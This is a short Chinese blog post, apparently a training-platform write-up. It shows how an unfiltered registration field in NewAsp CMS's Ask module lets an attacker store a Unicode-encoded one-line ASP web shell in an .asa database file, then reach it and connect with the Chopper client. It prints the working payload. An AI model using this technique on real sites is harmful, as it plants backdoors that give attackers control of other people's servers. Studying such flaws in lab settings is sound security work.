墨者学院 - CMS系统漏洞分析溯源(第3题)

版权声明:原创 多崎巡礼,未经许可禁止转载! https://blog.csdn.net/qq_42357070/article/details/83507188

新云网站内容管理系统是一套开源的WEB网站管理系统,采用目前非常成熟的ASP+Access/SQL开发而成。使用它,我们可以很方便的管理自己的网站,目前新云网站内容管理系统最新的版本是v4.0.0 SP2。本文要介绍的捕洞就出在新云网站内容管理系统v4.0.0 SP1以及未打官方最新补丁的v4.0.O SP2的问吧系统中。

新云的问吧是类似百度知道的互动知识问答分享平台,问吧采用自己的数据库,数据库文件为.asa格式,由于过滤不严,导致可以向数据库中插入一句话木马,从而拿到webshell。

 

题目给出提示得到

自然,注册账户

 

但“密码问题”需要特别注意,要填写    ┼攠數畣整爠煥敵瑳∨≡┩愾

也就是<% execute request("a")%>a经过Unicode转码后的代码。

 

 

注册信息全部填写完毕后点“立即注册”按钮,注册成功后我们的一句话木马就插入到数据库中了

问吧数据库的默认地址是问吧耳录下的data目录下的ask_newasp.asa,直接在浏览器中访问,看到了数据库的代码,拉到网页最下面,看到了熟悉的“类型不匹配:'execute'”,说明一句话木马已经成功的插入到数据库中了。

 

 

 

 

 

 

菜刀连接

 

 

Done

 

 

 

 

 

 

展开阅读全文

没有更多推荐了,返回首页